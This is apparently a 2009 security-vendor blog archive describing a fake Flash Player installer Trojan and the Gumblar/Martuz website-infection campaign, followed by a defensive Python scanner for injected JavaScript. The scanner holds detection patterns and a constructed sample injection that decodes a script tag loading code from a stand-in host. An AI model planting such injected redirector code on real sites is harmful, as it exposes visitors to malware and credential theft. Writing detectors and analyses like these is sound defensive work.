    Archive for May 22nd, 2009




    Cybercriminals have long used videos as a lure to get unsuspecting users to download and install malware onto their systems. Recently, however, a new variant turned up that departs slightly from the usual modus operandi.

    TROJ_SMALL.UY, at first glance, looks like fairly standard malware that gets itself installed by claiming it is needed to play a video. There is one difference, though: TROJ_SMALL.UY, which poses as an installer for Adobe Flash Player, really does install Adobe Flash Player.

    In fact, TROJ_SMALL.UY goes to a fair amount of trouble to look like a legitimate program. Consider, first of all, the page where it can be downloaded from:

    (Screenshot: the download page imitating the Adobe site)

    Whoever was behind this Trojan went to a lot of effort to replicate the look and feel of the real Adobe site, and even registered a domain name very close to the word Adobe.

    The same is true for the installer:

    Similarly, some effort has been made here to replicate a legitimate Windows installer. It would be easy to conclude that this was a genuine installer for Adobe Flash Player. It even adds an uninstaller entry in the Control Panel! Note that neither the look of the dialog nor the presence of an uninstaller proves anything; the installer's digital signature (File Properties, Digital Signatures tab) and the domain it was downloaded from are the checks that actually matter.

    While TROJ_SMALL.UY may indeed install Adobe Flash Player, something extra comes along for the ride: it also drops a DLL file that is detected as TROJ_DLOADER.ZEK. Since this is a Trojan downloader, the practical consequence is that the attackers can push any further malware they choose onto the affected system.

    The website hosting this modified Flash Player installer is already blocked by the Smart Protection Network, but it is doubtful that this is the last we will see of this particular technique.




    Gumblar.{BLOCKED}, the domain to which visitors of the reported compromised websites were being redirected, was taken down, only to be replaced by a new one: Martuz.{BLOCKED}.

    In an attack that quickly garnered much attention in the security industry, compromised websites were found to redirect visitors to Martuz.{BLOCKED}, which pushes a file download onto the visitor's system. The file then exploits Adobe PDF and Flash Player vulnerabilities to gain access to the system. Once installed, the malware steals stored passwords, including FTP credentials, and delivers them back to its creators. With those credentials the attackers tamper with the victim's own web server files, inserting obfuscated JavaScript into several of them. The vandalized pages containing the JavaScript become the malware authors' newest redirectors, continuing the cycle of information theft. In addition, the malicious file poisons the results of Google searches conducted on the affected system, leading the user to further malicious domains.

    Our engineers are still analyzing the malicious file. In the meantime, Trend Micro detects the redirecting scripts as HTML_JSREDIR.AE and HTML_REDIR.AC. The injected script differs from one infected page to the next, and the exact origin of the attack has yet to be determined.

    Using a browser other than Internet Explorer may help reduce the risk of infection, and updating Adobe Reader, Flash Player and the browser to patch the exploited vulnerabilities is a must. Site owners should clean up immediately if an infection is detected and change all passwords as soon as possible, since the attackers already hold any FTP credentials stolen from an infected machine.
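Because the injected script varies from page to page, a site owner cannot simply grep for one known string. The following scanner is an added example (not Trend Micro's detection logic and not the HTML_JSREDIR.AE or HTML_REDIR.AC signatures) that flags <script> blocks by generic traits of injected redirectors: calls to runtime decoders such as eval, unescape and String.fromCharCode, long runs of %XX or \xXX escapes, and external script sources on hosts the site does not own. The marker list, the OWN_HOSTS set and the two sample pages are constructed for the demo; example.invalid is a reserved name standing in for a redirector domain.

```python
"""Heuristic scan of a web root for injected, obfuscated JavaScript redirectors.

Added example, not Trend Micro's detection logic. The markers below are a
starting heuristic (an assumption), and the sample pages are constructed.
Tune OWN_HOSTS to the hosts your pages may legitimately load scripts from.
"""
import os
import re
import tempfile
from urllib.parse import urlparse

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script\s*>", re.I | re.S)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
# Runtime decoders that hand-written page scripts rarely need.
DECODER_RE = re.compile(r"\b(eval|unescape|String\.fromCharCode)\s*\(")
# Eight or more consecutive %XX or \xXX escapes: a payload decoded at run time.
ESCAPE_RUN_RE = re.compile(r"(?:%[0-9a-fA-F]{2}){8,}|(?:\\x[0-9a-fA-F]{2}){8,}")
WEB_EXTENSIONS = (".html", ".htm", ".php", ".js")


def scan_html(html, own_hosts):
    """Return [(offset, [reasons])] for every <script> block that looks injected."""
    findings = []
    for m in SCRIPT_RE.finditer(html):
        attrs, inline = m.group(1), m.group(2)
        reasons = []
        decoders = sorted(set(DECODER_RE.findall(inline)))
        if decoders:
            reasons.append("decoder calls: " + ", ".join(decoders))
        if ESCAPE_RUN_RE.search(inline):
            reasons.append("long escape sequence")
        src = SRC_RE.search(attrs)
        if src:
            host = urlparse(src.group(1)).hostname
            if host and host.lower() not in own_hosts:
                reasons.append("script loaded from foreign host " + host)
        if reasons:
            findings.append((m.start(), reasons))
    return findings


def scan_tree(root, own_hosts):
    """Walk a directory tree; return {path: findings} for files with suspicious scripts."""
    report = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(WEB_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings = scan_html(fh.read(), own_hosts)
            if findings:
                report[path] = findings
    return report


# Constructed sample pages (not captured from a real infection).
OWN_HOSTS = {"www.example.com"}
CLEAN_PAGE = """<html><head>
<script src="/js/menu.js"></script>
<script>document.getElementById('y').textContent = new Date().getFullYear();</script>
</head><body>Hello</body></html>"""
INJECTED = """<script>
var s="%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F";
document.write(unescape(s + "example.invalid/x.php%22%3E%3C/script%3E"));
</script><script src="http://example.invalid/go.js"></script>"""
INFECTED_PAGE = CLEAN_PAGE.replace("<body>", "<body>" + INJECTED)


def demo():
    """Write the sample pages to a temp dir, scan it, and return the flagged file names."""
    with tempfile.TemporaryDirectory() as root:
        for name, content in (("about.html", CLEAN_PAGE), ("index.php", INFECTED_PAGE)):
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(content)
        report = scan_tree(root, OWN_HOSTS)
        return sorted(os.path.basename(p) for p in report)


if __name__ == "__main__":
    for offset, reasons in scan_html(INFECTED_PAGE, OWN_HOSTS):
        print("offset %d: %s" % (offset, "; ".join(reasons)))
    print("flagged files:", demo())
```

Run `scan_tree("/var/www", OWN_HOSTS)` against a real document root to get a per-file list of suspicious blocks; the clean sample page produces no findings, while the infected one is flagged twice, once for the unescape-decoded payload and once for the script tag pointing at a foreign host. Treat hits as leads for manual review rather than verdicts, and remember that a cleaned page will simply be reinfected until the stolen FTP passwords are changed.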




    © Copyright 2011 Trend Micro Inc. All rights reserved.